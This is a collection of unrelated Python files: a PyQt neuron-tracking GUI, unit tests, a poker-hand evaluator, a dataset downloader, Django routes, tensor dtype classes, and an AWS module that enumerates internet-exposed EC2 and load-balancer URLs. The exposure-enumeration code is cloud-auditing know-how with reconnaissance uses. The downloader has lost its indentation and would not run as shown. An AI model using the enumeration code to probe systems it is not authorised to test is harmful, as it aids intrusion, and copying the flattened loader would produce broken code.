        """Return a callback highlighting neuron ``idx_from1``."""
        def button_press_function():
            self.controller.highlight_neuron(idx_from1)
        return button_press_function

    def _make_button_press_function_th(self, i, idx_from1):
        """Return a callback jumping to row ``i``'s frame AND highlighting the neuron."""
        def button_press_function():
            self.controller.go_to_frame(np.clip(self.chunksize * self.chunknumber + i, 0, self.T-1))
            self.controller.highlight_neuron(idx_from1)
        return button_press_function

    def change_t(self, t):
        """Callback when the controller changes the current frame to ``t``."""
        # unselect previous current button
        current_btn = self.current_label_button
        current_btn.setStyleSheet("background-color : rgb(255,255,255); border-radius: 4px;")
        current_btn.setStyle(current_btn.style()) # for some reason this is needed to actually change the color
        # change time
        chunknumber = t // self.chunksize
        if self.chunknumber != chunknumber:
            # Moved into another chunk: relabel every row with its new frame number.
            for i in range(self.chunksize):
                t_i = self.chunksize * chunknumber + i
                self.time_label_buttons[i].setText(str(t_i) if t_i < self.T else "")
            self.chunknumber = chunknumber
        self.current_i = t % self.chunksize
        # select new current button
        current_btn = self.current_label_button
        self.scrollarea.ensureWidgetVisible(current_btn)
        current_btn.setStyleSheet("background-color : rgb(42,99,246); border-radius: 4px;")
        current_btn.setStyle(current_btn.style()) # for some reason this is needed to actually change the color

    def change_neuron_keys(self, key_changes):
        """
        :param key_changes: list of (neuron_idx_from1, key), with key=None for unassigning
        """
        for idx_from1, key in key_changes:
            if key is None and idx_from1 in self.button_columns: # remove the button column
                for btn in self.button_columns[idx_from1]:
                    # btn.widget().setParent(None)
                    btn.setParent(None)
                self.n_cols -= 1
            else: # add a column of buttons
                j = self.n_cols
                col = []
                # Header button: the assigned key, colored with the neuron's color.
                button = QPushButton(key)
                button.clicked.connect(self._make_button_press_function_h(idx_from1))
                # button.setFixedWidth(25)
                color = self.controller.neuron_color(idx_from1)
                button.setStyleSheet("background-color : rgb(" + str(color[0]) + "," + str(
                    color[1]) + "," + str(color[2]) + "); border-radius: 4px;")
                col.append(button)
                self.topgrid.addWidget(button, 0, j + 1)
                # find at which times the neuron is present
                times_present = set(self.controller.times_of_presence(idx_from1))
                for i in range(self.chunksize):
                    callback = self._make_button_press_function_th(i, idx_from1)
                    button = DashboardItem(idx_from1, callback)
                    t = self.chunknumber * self.chunksize + i
                    if t in times_present:
                        button.set_present()
                    else:
                        button.set_absent()
                    col.append(button)
                    self.grid.addWidget(button, i, j + 1)
                self.button_columns[idx_from1] = col
                self.n_cols += 1

    def change_present_neurons(self, present=None, added=None, removed=None):
        """
        Changes which of the neurons are present in current frame, as their corresponding buttons should be colored
        in blue instead of red.
        :param present: which neuron indices (from 1) are present, if given
        :param added: single neuron index (from 1) that was added, if given
        :param removed: single neuron index (from 1) that was removed, if given
        """
        if present is not None:
            for i_from1, col in self.button_columns.items():
                # col[0] is the header button, so row cells start at index 1.
                if i_from1 in present:
                    col[self.current_i+1].set_present()
                else:
                    col[self.current_i+1].set_absent()
            return
        if added is not None and added in self.button_columns:
            self.button_columns[added][self.current_i+1].set_present()
        if removed is not None and removed in self.button_columns:
            self.button_columns[removed][self.current_i+1].set_absent()

    def change_present_neurons_all_times(self, neuron_presence):
        """Refresh every cell of every column from the full presence matrix.

        :param neuron_presence: truth matrix indexed by [time, neuron_idx_from1]
        """
        for idx_from1, column in self.button_columns.items():
            for i in range(self.chunksize):
                t = self.chunknumber * self.chunksize + i
                if t >= self.T:
                    break
                if neuron_presence[t, idx_from1]:
                    column[i+1].set_present()
                else:
                    column[i+1].set_absent()
class TrackTab(QWidget):
    """Tab for launching a tracking method in a separate process.

    Available methods and their help texts come from ``tracking_methods``;
    progress is polled over a Pipe and displayed in a QProgressDialog.
    """
    def __init__(self,controller):
        """
        :param controller: main controller to report to
        """
        super().__init__()
        self.controller = controller
        self.methods=tracking_methods.methodnames
        self.methodhelps=tracking_methods.methodhelps
        self.grid=QGridLayout()
        row=0
        self.grid.addWidget(QLabel("Select Method:"),row,0)
        row+=1
        # Combo box with an empty first entry meaning "no method selected".
        self.combobox=QComboBox()
        self.combobox.addItem("")
        for key in self.methods:
            self.combobox.addItem(key)
        self.combobox.setCurrentIndex(0)
        self.combobox.currentIndexChanged.connect(self.make_method_change_func())
        self.grid.addWidget(self.combobox,row,0)
        row+=1
        self.grid.addWidget(QLabel("Parameters:"),row,0)
        row+=1
        # Scrollable help text describing the selected method.
        scroll=QScrollArea()
        scroll.setWidgetResizable(True)
        content = QWidget()
        lay = QVBoxLayout()
        self.help=QLabel()
        self.help.setWordWrap(True)
        self.help.setAlignment(Qt.AlignLeft | Qt.AlignTop)
        lay.addWidget(self.help)
        content.setLayout(lay)
        scroll.setWidget(content)
        self.grid.addWidget(scroll,row,0)
        row+=1
        # Free-form parameter string handed to the tracking method.
        self.param_edit=QLineEdit()
        self.grid.addWidget(self.param_edit,row,0)
        row+=1
        # Run button stays disabled until a real method is chosen.
        self.run_button=QPushButton("Run")
        self.run_button.setStyleSheet("background-color : rgb(93,177,130); border-radius: 4px; min-height: 20px")
        self.run_button.setEnabled(False)
        self.run_button.clicked.connect(self.make_run_function())
        self.grid.addWidget(self.run_button,row,0)
        row+=1
        self.setLayout(self.grid)

    def make_method_change_func(self):
        """Return the slot that updates help text / Run button on method change."""
        def method_change_func(index):
            if index==0:
                # The empty placeholder entry is selected: nothing to run.
                self.run_button.setEnabled(False)
                self.help.setText("")
            else:
                self.run_button.setEnabled(True)
                self.help.setText(self.methodhelps[str(self.combobox.currentText())])
        return method_change_func

    def make_run_function(self):
        """Return the slot that launches the currently selected method."""
        def run_function():
            name=str(self.combobox.currentText())
            params=self.param_edit.text()
            self.run(name,params)
        return run_function

    def run(self,method_name,params):
        """Confirm with the user, then run ``method_name`` in a subprocess.

        Saves the current status, releases the dataset (``pause_for_NN``),
        spawns ``tracking_methods.run`` in a separate process and polls it
        over a Pipe, updating a progress dialog until the subprocess reports
        "Done" or the user cancels; finally re-attaches the dataset.

        :param method_name: name of the tracking method to run
        :param params: free-form parameter string passed to the method
        """
        msgbox=QMessageBox()
        msgbox.setText("Confirm Run")
        msgbox.setInformativeText("Run "+method_name+" with "+params+"?")
        msgbox.setStandardButtons(QMessageBox.Yes|QMessageBox.No)
        res=msgbox.exec()
        if res==QMessageBox.No:
            return
        self.controller.save_status()
        # Release the dataset so the subprocess can open it.
        dataset_path = self.controller.pause_for_NN()
        progress=QProgressDialog("","cancel",-1,101)
        labeltext="Running "+method_name+((" with "+params) if params!="" else "") +":\n"
        progress.setLabelText(labeltext)
        progress.showNormal()
        progress.resize(500,100)
        progress.setWindowModality(Qt.WindowModal)
        progress.setValue(-1)
        QApplication.processEvents()
        command_pipe_main,command_pipe_sub=Pipe()
        process = Process(target=tracking_methods.run, args=(method_name,command_pipe_sub,dataset_path,params))
        process.start()
        command_pipe_main.send("run")
        # Poll the subprocess: request progress reports until done or cancelled.
        while True:
            if progress.wasCanceled():
                command_pipe_main.send("cancel")
                break
            command_pipe_main.send("report")
            res=command_pipe_main.recv()
            if res=="Done":
                command_pipe_main.send("close")
                break
            else:
                if type(res)==list:
                    # res is [step name, progress value]
                    stepname,progress_value=res
                    progress.setLabelText(labeltext+stepname)
                    progress.setValue(progress_value)
            QApplication.processEvents()
        process.join()
        progress.setValue(101)
        # Re-attach the (possibly updated) dataset to the GUI.
        self.controller.unpause_for_NN(dataset_path)
|
import unittest
from app.models import Category
from app import db
class CategoryModelTest(unittest.TestCase):
    """Class that tests the Category Model."""

    def setUp(self):
        """Set Up Test that creates a new category instance."""
        self.new_category = Category(name="interview pitch")

    def tearDown(self):
        """Deletes all category elements from the database after every test."""
        Category.query.delete()
        db.session.commit()

    def test_category_variables(self):
        """Checks if the category variables are correctly placed."""
        # FIX: assertEquals is a deprecated alias (removed in Python 3.12);
        # use the canonical assertEqual.
        self.assertEqual(self.new_category.name, "interview pitch")

    def test_save_category(self):
        """Checks if a category is being saved."""
        self.new_category.save_category()
        self.assertTrue(len(Category.query.all()) > 0)

    def test_get_categories(self):
        """Checks if all categories are returned."""
        extra_categories = [
            Category(name="product pitch"),
            Category(name="story pitch"),
            Category(name="Shoot your Shot"),
            Category(name="app pitch"),
            Category(name="election pitch"),
        ]
        self.new_category.save_category()
        for category in extra_categories:
            category.save_category()
        got_categories = Category.get_categories()
        # assertEqual gives a useful failure message (actual count) vs assertTrue.
        self.assertEqual(len(got_categories), 6)
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from .common import CHROMATICITY_DIAGRAM_TRANSFORMATIONS, Cycle
__all__ = ['CHROMATICITY_DIAGRAM_TRANSFORMATIONS', 'Cycle']
|
# http://www.codingdojo.org/cgi-bin/index.pl?KataPokerHands
from enum import Enum
RESULTS = Enum('RESULTS', 'WIN DRAW LOSE')
def poker_hands(a, b):
    """Compare two five-card poker hands.

    :param a: first hand, iterable of 2-char card strings (e.g. 'TD' = ten of diamonds)
    :param b: second hand, same format
    :return: (result, win_rank, win_card) where result is a RESULTS member
             (from a's point of view), win_rank is the rank name of the winning
             hand (None on a draw), and win_card is the human-readable deciding
             card when the tie was broken by card values (None otherwise).
    """
    def get_score(x):
        return ask_rank_score(ask_rank(x))

    rank_a, rank_b = ask_rank(a), ask_rank(b)
    win_card, win_rank = None, None
    score_a, score_b = get_score(a), get_score(b)
    if score_a == score_b:
        # Same rank: compare card values (ordered by multiplicity then value).
        value_a, value_b = get_value_card(a), get_value_card(b)
        for i, j in zip(value_a, value_b):
            if i != j:
                result = RESULTS.WIN if i > j else RESULTS.LOSE
                win_card = i if i > j else j
                break
        else:
            result = RESULTS.DRAW
    else:
        result = RESULTS.WIN if score_a > score_b else RESULTS.LOSE
    if result != RESULTS.DRAW:
        # BUG FIX: was `rank_a if RESULTS.WIN else rank_b` — an enum member is
        # always truthy, so rank_a was reported even when hand b won.
        win_rank = rank_a if result == RESULTS.WIN else rank_b
    if win_card:
        # Map numeric value (2..14) to a display name; indices 0-10 are digits.
        card = \
            [str(i) for i in range(11)] + ['Jack', 'Queen', 'King', 'Ace']
        win_card = card[win_card]
    return (result, win_rank, win_card)
def get_value_card(a):
    """Return the hand's card values sorted by (count, value) descending.

    Used for tie-breaking between hands of equal rank.
    """
    scores = [get_card_score(card) for card in a]
    grouped = sorted(((scores.count(v), v) for v in set(scores)), reverse=True)
    return [value for _, value in grouped]
# Score
def ask_rank(cards):
    """Return the name of the best rank matching ``cards``, 'high card' if none.

    Checks are ordered strongest-first so the first match is the hand's rank.
    """
    checks = (
        (is_straight_flush_rank, 'straight flush'),
        (check_four_of_kind, 'four of kind'),
        (check_full_house, 'full house'),
        (check_flush, 'flush'),
        (is_straight_rank, 'straight'),
        (check_three_of_kind, 'three of kind'),
        (check_two_pairs, 'two pairs'),
        (check_one_pair, 'pair'),
    )
    return next((name for predicate, name in checks if predicate(cards)),
                'high card')
def ask_rank_score(rank):
    """Map a rank name to its strength, 0 ('high card') … 8 ('straight flush').

    Unknown rank names score 0, like the original dict.get default.
    """
    ordered_ranks = (
        'high card', 'pair', 'two pairs', 'three of kind', 'straight',
        'flush', 'full house', 'four of kind', 'straight flush',
    )
    try:
        return ordered_ranks.index(rank)
    except ValueError:
        return 0
# Integration method
def is_straight_rank(cards):
    """True for a straight that is not also a flush."""
    return not check_flush(cards) and check_straight(cards)
def is_flush_rank(cards):
    """True for a flush that is not also a straight."""
    return check_flush(cards) and not check_straight(cards)
def is_straight_flush_rank(cards):
    """True when the hand is simultaneously a straight and a flush."""
    return all(predicate(cards) for predicate in (check_straight, check_flush))
# Unit method
def get_card_score(card):
    """Return the numeric value (2–14) of a card string such as '7H' or 'AS'.

    The first character encodes the face: '2'-'9', then T, J, Q, K, A.
    """
    face_order = '23456789TJQKA'
    return face_order.index(card[0]) + 2
def get_set_number_of_cards(cards):
    """Return the multiplicity of each distinct face value in the hand.

    Order of the counts is unspecified (driven by set iteration).
    """
    faces = [card[0] for card in cards]
    return [faces.count(face) for face in set(faces)]
def check_one_pair(cards):
    """One pair: five cards collapse to exactly four distinct face values."""
    distinct_values = get_set_number_of_cards(cards)
    return len(distinct_values) == 4
def check_two_pairs(cards):
    """Two distinct pairs plus one kicker: multiplicities are exactly {1,2,2}."""
    return sorted(get_set_number_of_cards(cards)) == [1, 2, 2]
def check_three_of_kind(cards):
    """A triple plus two distinct kickers: multiplicities are exactly {1,1,3}."""
    return sorted(get_set_number_of_cards(cards)) == [1, 1, 3]
def check_straight(cards):
    """Five distinct consecutive values (Ace-low 'wheel' is not recognised)."""
    values = sorted(get_card_score(card) for card in cards)
    return len(set(values)) == 5 and values[-1] - values[0] == 4
def check_flush(cards):
    """All cards share one suit (the second character of each card string)."""
    suits = [card[1] for card in cards]
    return len(set(suits)) == 1
def check_full_house(cards):
    """A triple plus a pair: multiplicities are exactly {2,3}."""
    return sorted(get_set_number_of_cards(cards)) == [2, 3]
def check_four_of_kind(cards):
    """Four of a kind plus one kicker: multiplicities are exactly {1,4}."""
    return sorted(get_set_number_of_cards(cards)) == [1, 4]
|
###
# Sample data loading code. Adapted from MNE Python.
#
# All credit to:
##
####
# Authors: Alexandre Gramfort <gramfort@nmr.mgh.harvard.edu>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
# Eric Larson <larson.eric.d@gmail.com>
# Denis Egnemann <d.engemann@fz-juelich.de>
# License: BSD Style.
import os
import os.path as op
import shutil
import tarfile
import logging
logger = logging.getLogger('forwardlog')
from mne.utils import _fetch_file
def _data_path(path=None, force_update=False, update_path=True,
download=True, name=None, verbose=None):
if path is None:
path = op.join(os.environ["COMA_DIR"],"examples")
if not isinstance(path, basestring):
raise ValueError('path must be a string or None')
if name == 'example':
archive_name = "ComaSample.tar.gz"
url = "https://www.dropbox.com/s/thpu5cph0hv94bz/" + archive_name + "?dl=1"
folder_name = "ComaSample"
folder_path = op.join(path, folder_name)
rm_archive = False
else:
raise ValueError('Sorry, the dataset "%s" is not known.' % name)
if not op.exists(folder_path) and not download:
return ''
if not op.exists(folder_path) or force_update:
logger.info('Sample data archive %s not found at:\n%s\n'
'It will be downloaded and extracted at this location.'
% (archive_name, folder_path))
archive_name = op.join(path, archive_name)
rm_archive = True
if op.exists(archive_name):
msg = ('Archive already exists at %r. Overwrite it '
'(y/[n])? ' % archive_name)
answer = raw_input(msg)
if answer.lower() == 'y':
os.remove(archive_name)
else:
raise IOError('Archive file already exists at target '
'location %r.' % archive_name)
_fetch_file(url, archive_name, print_destination=False)
if op.exists(folder_path):
shutil.rmtree(folder_path)
logger.info('Decompressing the archive: ' + archive_name)
logger.info('... please be patient, this can take some time')
for ext in ['gz', 'bz2']: # informed guess (and the only 2 options).
try:
tarfile.open(archive_name, 'r:%s' % ext).extractall(path=path)
except tarfile.ReadError, err:
logger.info('%s is %s trying "bz2"' % (archive_name, err))
if rm_archive:
os.remove(archive_name)
path = op.abspath(path)
path = op.join(path, folder_name)
return path
|
# -*- coding: utf-8 -*-
from django.conf.urls import patterns, url
# URL routes for the races app. NOTE(review): this uses the pre-Django-1.8
# `patterns()` helper with dotted-string view names (removed in Django 1.10);
# keep that in mind before upgrading the Django dependency.
urlpatterns = patterns(
    'dnd.races.views',
    # races
    url(
        r'^$',
        'race_index',
        name='race_index',
    ),
    # races > by rulebooks
    url(
        r'^by-rulebooks/$',
        'race_list_by_rulebook',
        name='race_list_by_rulebook',
    ),
    # races > rulebook
    url(
        r'^(?P<rulebook_slug>[^/]+)--(?P<rulebook_id>\d+)/$',
        'races_in_rulebook',
        name='races_in_rulebook',
    ),
    # races > rulebook > feat
    url(
        r'^(?P<rulebook_slug>[^/]+)--(?P<rulebook_id>\d+)/(?P<race_slug>[^/]+)--(?P<race_id>\d+)/$',
        'race_detail',
        name='race_detail',
    ),
    # racial types
    url(
        r'^types/$',
        'race_type_index',
        name='race_type_index'
    ),
    # race > detail
    url(
        r'^types/(?P<race_type_slug>[^/]+)/$',
        'race_type_detail',
        name='race_type_detail'
    ),
)
|
from itertools import chain
from typing import List
from collections import namedtuple, defaultdict
import logging
logger = logging.getLogger()
# (url, instance_id) pair describing an internet-reachable EC2 endpoint.
EC2Url = namedtuple('EC2Url', ['url', 'instance_id'])


def get_ec2_urls(ec2_client) -> List[EC2Url]:
    """
    Returns a collection of EC2 instances URL addresses
    which exposed to the internet.

    An instance is reported when it has a public IP on a network interface
    whose security group allows ingress from a 0.0.0.0/… CIDR; both the http
    and https variant of every open port is returned.

    param ec2_client: botocore.client.EC2
    """
    urls = set()
    reservations = list(chain(*(page['Reservations']
                    for page in ec2_client.get_paginator('describe_instances').paginate(
                        Filters=[
                            {
                                'Name': 'instance-state-name',
                                'Values': ['running']
                            }
                        ]))))
    # Map security-group id -> [(public_ip, instance_id), ...]
    group_ids_to_instances = defaultdict(list)
    for reservation in reservations:
        for instance_data in reservation['Instances']:
            i_id = instance_data['InstanceId']
            for network_inr in instance_data['NetworkInterfaces']:
                association = network_inr.get('Association')
                if not association:
                    continue
                public_ip = association.get('PublicIp')
                if public_ip is None:
                    continue  # only collect public ip addresses
                for group in network_inr.get('Groups', []):
                    group_ids_to_instances[group['GroupId']].append((public_ip, i_id))
    if not group_ids_to_instances:
        return list(urls)
    group_ids_to_instances = dict(group_ids_to_instances)
    sec_groups = list(
        chain(*(page['SecurityGroups']
                for page in ec2_client.get_paginator('describe_security_groups').paginate(
                    GroupIds=list(group_ids_to_instances.keys())
                ))))
    for sec in sec_groups:
        for ip_perm in sec['IpPermissions']:
            # BUG FIX: FromPort is an int in the EC2 API (and absent for
            # all-traffic / protocol -1 rules); the old comparison against the
            # string '-1' never matched and all-traffic rules raised KeyError.
            from_port = ip_perm.get('FromPort')
            if from_port is None or from_port == -1:
                continue  # skip rules with no usable port (e.g. all traffic)
            for ip_range in ip_perm['IpRanges']:
                if ip_range['CidrIp'].startswith("0.0.0.0/"):
                    for public_ip, instance_id in group_ids_to_instances[sec['GroupId']]:
                        urls.add(EC2Url(f'http://{public_ip}:{from_port}/', instance_id))
                        urls.add(EC2Url(f'https://{public_ip}:{from_port}/', instance_id))
    return list(urls)
# URL plus the request details (headers, explicit HTTP method, query params)
# needed to satisfy the load-balancer rule that exposes it.
LoadBalancerUrl = namedtuple('LoadBalancerUrl', ['url', 'identifier', 'header', 'explicit_method', 'params'])
def _get_string_from_reg(s: str) -> str:
example_string = s.replace('?', 'a')
return example_string.replace('*', 'test')
def get_load_balancers(elb_client) -> List[LoadBalancerUrl]:
    """
    Returns a collection of load balancers URL addresses
    which exposed to the internet, together with the headers, HTTP method and
    query parameters an example request must carry to match each listener rule.
    param elb_client: botocore.client.ELB2
    """
    results = list()
    response = elb_client.describe_load_balancers()
    lb_info = response['LoadBalancers']
    for lb in lb_info:
        # Only internet-facing load balancers are reachable from outside.
        if lb['Scheme'] != 'internet-facing':
            continue
        dns_name = lb['DNSName']
        load_balancer_identifier = lb['LoadBalancerName']
        resp_listener = elb_client.describe_listeners(LoadBalancerArn=lb['LoadBalancerArn'])
        for listener in resp_listener['Listeners']:
            port = listener['Port']
            if listener['Protocol'] == 'HTTP':
                protocols = ['http']
            elif listener['Protocol'] == 'HTTPS':
                protocols = ['https']
            else:
                # Unknown listener protocol: try both schemes.
                protocols = ['http', 'https']
            rules = elb_client.describe_rules(ListenerArn=listener['ListenerArn'])['Rules']
            if not rules:
                # No routing rules: the bare DNS name + port is the URL.
                for p in protocols:
                    results.append(LoadBalancerUrl(
                        url=f'{p}://{dns_name}:{port}/',
                        identifier=load_balancer_identifier,
                        header={},
                        explicit_method=None,
                        params={}
                    ))
            for rule in rules:
                for action in rule.get('Actions', []):
                    if action['Type'] in ('fixed-response', 'authenticate-oidc', 'authenticate-cognito'):
                        continue  # We don't want to check the URI, if the target of the LB of those types.
                    # Build one example request satisfying every condition of the rule.
                    subdomain = ""
                    params = {}
                    explicit_request_method = None
                    uri_to_append = '/'
                    headers_needed = {}
                    for condition in rule.get('Conditions', []):
                        if condition['Field'] == 'http-header':
                            # Required request header, with wildcards made concrete.
                            header_config = condition['HttpHeaderConfig']
                            headers_needed[header_config['HttpHeaderName']] = _get_string_from_reg(header_config['Values'][0])
                        elif condition['Field'] == 'path-pattern':
                            path_config = condition['PathPatternConfig']
                            uri_to_append = _get_string_from_reg(path_config['Values'][0])
                            if uri_to_append[0] != '/':
                                uri_to_append = '/' + uri_to_append
                        elif condition['Field'] == 'host-header':
                            # NOTE(review): the example host is prefixed to the LB DNS
                            # name as '<host>.<dns_name>' — confirm this matches how
                            # callers resolve the URL.
                            host_config = condition['HostHeaderConfig']
                            subdomain = f'{_get_string_from_reg(host_config["Values"][0])}.'
                        elif condition['Field'] == 'query-string':
                            query_config = condition['QueryStringConfig']
                            for val in query_config["Values"]:
                                if 'Key' in val:
                                    params[val['Key']] = _get_string_from_reg(val['Value'])
                                else:
                                    # Value-only condition: use a placeholder key.
                                    params['test'] = _get_string_from_reg(val['Value'])
                        elif condition['Field'] == 'http-request-method':
                            request_config = condition['HttpRequestMethodConfig']
                            explicit_request_method = request_config["Values"][0]
                        else:
                            continue
                    for p in protocols:
                        results.append(LoadBalancerUrl(
                            url=f'{p}://{subdomain}{dns_name}:{port}{uri_to_append}',
                            identifier=load_balancer_identifier,
                            header=headers_needed,
                            explicit_method=explicit_request_method,
                            params=params
                        ))
    return results
|
from django.shortcuts import render
def home(request):
    """Render the static landing page for the site."""
    template_name = 'pages/home.html'
    return render(request, template_name)
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
from .base_armour import Armour
from ... import material as M
class BaseCloak(Armour):
    """Common base class for all cloak-type armour items."""
    pass
class MummyWrapping(BaseCloak):
    """Weight-3 cloth cloak providing no armour-class bonus."""
    def __init__(self):
        super(MummyWrapping, self).__init__(
            'mummy wrapping', weight=3, armour_class=0, material=M.Cloth)
class OrcishCloak(BaseCloak):
    """Weight-10 cloth cloak providing no armour-class bonus."""
    def __init__(self):
        super(OrcishCloak, self).__init__(
            'orcish cloak', weight=10, armour_class=0, material=M.Cloth)
class DwarvishCloak(BaseCloak):
    """Weight-10 cloth cloak providing no armour-class bonus."""
    def __init__(self):
        super(DwarvishCloak, self).__init__(
            'dwarvish cloak', weight=10, armour_class=0, material=M.Cloth)
class LeatherCloak(BaseCloak):
    """Weight-15 leather cloak granting 1 point of armour class."""
    def __init__(self):
        super(LeatherCloak, self).__init__(
            'leather cloak', weight=15, armour_class=1, material=M.Leather)
class OilskinCloak(BaseCloak):
    """Weight-10 cloth cloak granting 1 point of armour class."""
    def __init__(self):
        super(OilskinCloak, self).__init__(
            'oilskin cloak', weight=10, armour_class=1, material=M.Cloth)
|
from .core import *
from .interaction import *
from .normalization import *
from .activation import *
from .sequence import *
|
# Copyright 2016 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
import ctypes
import string
import re
import six
import numpy as np
from . import language_pb2 as lang
class DType(object):
    """
    Data type object which indicates a low level type.

    Wraps a protobuf ``lang.DType`` enum value and converts it to the
    equivalent numpy, ctypes, C, and TensorFlow spellings.
    """
    # numpy scalar type -> protobuf dtype enum
    _np_lookup = {
        np.float16: lang.FLOAT16,
        np.float32: lang.FLOAT32,
        np.float64: lang.FLOAT64,
        np.int8: lang.INT8,
        np.int16: lang.INT16,
        np.int32: lang.INT32,
        np.int64: lang.INT64,
        np.uint8: lang.UINT8,
        np.uint16: lang.UINT16,
        np.uint32: lang.UINT32,
        np.uint64: lang.UINT64}
    # protobuf dtype enum -> ctypes type (FLOAT16 absent: ctypes has no half type)
    _ctypes_lookup = {
        lang.FLOAT32: ctypes.c_float,
        lang.FLOAT64: ctypes.c_double,
        lang.INT8: ctypes.c_int8,
        lang.INT16: ctypes.c_int16,
        lang.INT32: ctypes.c_int32,
        lang.INT64: ctypes.c_int64,
        lang.UINT8: ctypes.c_uint8,
        lang.UINT16: ctypes.c_uint16,
        lang.UINT32: ctypes.c_uint32,
        lang.UINT64: ctypes.c_uint64
    }
    # protobuf dtype enum -> C type name emitted by the code generators
    _cstr_lookup = {
        lang.FLOAT32: 'float',
        lang.FLOAT64: 'double',
        lang.INT8: 'int8_t',
        lang.INT16: 'int16_t',
        lang.INT32: 'int32_t',
        lang.INT64: 'int64_t',  # bugfix: was 'int64_tf', an invalid C type name
        lang.UINT8: 'uint8_t',
        lang.UINT16: 'uint16_t',
        lang.UINT32: 'uint32_t',
        lang.UINT64: 'uint64_t'
    }
    # protobuf dtype enum -> TensorFlow dtype string
    # NOTE(review): float16, uint32 and uint64 are absent -- presumably not
    # supported as TensorFlow IO types here; confirm before adding them.
    _tensorflow_lookup = {
        lang.FLOAT32: 'float',
        lang.FLOAT64: 'double',
        lang.INT8: 'int8',
        lang.INT16: 'int16',
        lang.INT32: 'int32',
        lang.INT64: 'int64',
        lang.UINT8: 'uint8',
        lang.UINT16: 'uint16'
    }
    def __init__(self, dtype):
        """
        :param dtype: a DType (copied), a numpy scalar type, or a protobuf
            ``lang.DType`` enum integer
        :raises ValueError: if an integer is not a valid ``lang.DType`` value
        :raises TypeError: for any other argument type
        """
        if type(dtype) is DType:
            self.proto_dtype = dtype.proto_dtype
        elif dtype in list(DType._np_lookup.keys()):
            # find index by equality, rather than equivalency
            index = list(DType._np_lookup.keys()).index(dtype)
            self.proto_dtype = list(DType._np_lookup.values())[index]
        elif isinstance(dtype, six.integer_types):
            if dtype not in list(lang.DType.values()):
                raise ValueError('dtype ' + str(dtype) + ' is not valid.')
            else:
                self.proto_dtype = dtype
        else:
            raise TypeError('dtype ' + str(dtype) + ' is not valid.')
    def __eq__(self, other):
        if type(other) is not DType:
            return False
        else:
            return self.proto_dtype == other.proto_dtype
    def __hash__(self):
        # bugfix: hash the enum value itself instead of id(). id() of an int
        # only coincides for equal values via CPython's small-int cache, so
        # equal DTypes were not guaranteed to hash equal on every interpreter.
        return hash(self.proto_dtype)
    def __ne__(self, other):
        return not self == other
    def __str__(self):
        return lang.DType.Name(self.proto_dtype)
    def as_numpy(self):
        """Return the numpy scalar type corresponding to this DType."""
        return list(DType._np_lookup.keys())[list(DType._np_lookup.values()).index(self.proto_dtype)]
    def as_ctypes(self):
        """Return the ctypes type corresponding to this DType."""
        return DType._ctypes_lookup[self.proto_dtype]
    def as_cstr(self):
        """Return the C type name corresponding to this DType."""
        return DType._cstr_lookup[self.proto_dtype]
    def as_tensorflow(self):
        """Return the TensorFlow dtype string corresponding to this DType."""
        return DType._tensorflow_lookup[self.proto_dtype]
    def as_proto(self):
        """Return the protobuf ``lang.DType`` enum value."""
        return self.proto_dtype
#: The half-precision floating point DType
float16 = DType(lang.FLOAT16)
#: The single precision floating point DType
float32 = DType(lang.FLOAT32)
#: The double precision floating point DType
float64 = DType(lang.FLOAT64)
#: The 8 bit signed integer DType
int8 = DType(lang.INT8)
#: The 16 bit signed integer DType
int16 = DType(lang.INT16)
#: The 32 bit signed integer DType
int32 = DType(lang.INT32)
#: The 64 bit signed integer DType
int64 = DType(lang.INT64)
#: The 8 bit unsigned integer DType
uint8 = DType(lang.UINT8)
#: The 16 bit unsigned integer DType
uint16 = DType(lang.UINT16)
#: The 32 bit unsigned integer DType
uint32 = DType(lang.UINT32)
#: The 64 bit unsigned integer DType
uint64 = DType(lang.UINT64)
#: Every DType usable for operator inputs, outputs, and constants
supported_types = [float16, float32, float64, int8, int16, int32, int64, uint8, uint16, uint32, uint64]
class TensorType(object):
    """
    A tensor is defined by its data type and its shape.
    """
    def __init__(self, shape, dtype):
        """
        :param shape: The tensor shape: a single int or an iterable of positive ints
        :param dtype: The data type
        :return: A tensor type object
        :raises TypeError: if any dimension is None or not an int
        :raises ValueError: if any dimension is not positive
        """
        self.dtype = DType(dtype)
        if isinstance(shape, six.integer_types):
            self.shape = [shape]
        else:
            self.shape = []
            for elem in shape:
                if elem is None:
                    raise TypeError('All dimensions must be defined.')
                elif not isinstance(elem, six.integer_types):
                    raise TypeError('Shape must be an iterable of ints.')
                else:
                    self.shape.append(elem)
        for elem in self.shape:
            if elem <= 0:
                raise ValueError('All tensor dimensions must be positive, but got: ' + str(self.shape))
        # total number of elements
        self.size = 1
        for elem in self.shape:
            self.size *= elem
        self.rank = len(self.shape)
        # keep a protobuf mirror of this type for serialization/comparison
        self._proto_tensor_type = lang.TensorType()
        self._proto_tensor_type.dtype = self.dtype.proto_dtype
        self._proto_tensor_type.shape.extend(self.shape)
    def __eq__(self, other):
        if not isinstance(other, TensorType):
            return False
        else:
            return self._proto_tensor_type == other.as_proto()
    def __ne__(self, other):
        # bugfix: delegate to __eq__. The previous implementation used an
        # exact type check (`type(other) is not TensorType`) while __eq__
        # used isinstance(), so an instance of a TensorType subclass could
        # compare both equal and not-equal at the same time.
        return not self.__eq__(other)
    def __str__(self):
        return str(self._proto_tensor_type)
    @staticmethod
    def like(other):
        """
        Resolve the TensorType the argument
        :param other: The input object; anything exposing ``shape``/``dtype``
            (numpy style) or ``get_shape()``/``dtype.as_numpy_dtype`` (TensorFlow style)
        :return: A TensorType like the input object
        """
        try:
            other_shape = other.shape
        except AttributeError:
            other_shape = other.get_shape().as_list()
        try:
            other_dtype = other.dtype.as_numpy_dtype().dtype
        except AttributeError:
            other_dtype = other.dtype
        return TensorType(other_shape, other_dtype)
    @staticmethod
    def from_proto(proto):
        """
        Recover TensorType object from protocol buffer serialization
        :param proto: the protobuf
        :return: A TensorType object
        """
        return TensorType(proto.shape, proto.dtype)
    def as_proto(self):
        """
        Serialize this object as a protocol buffer
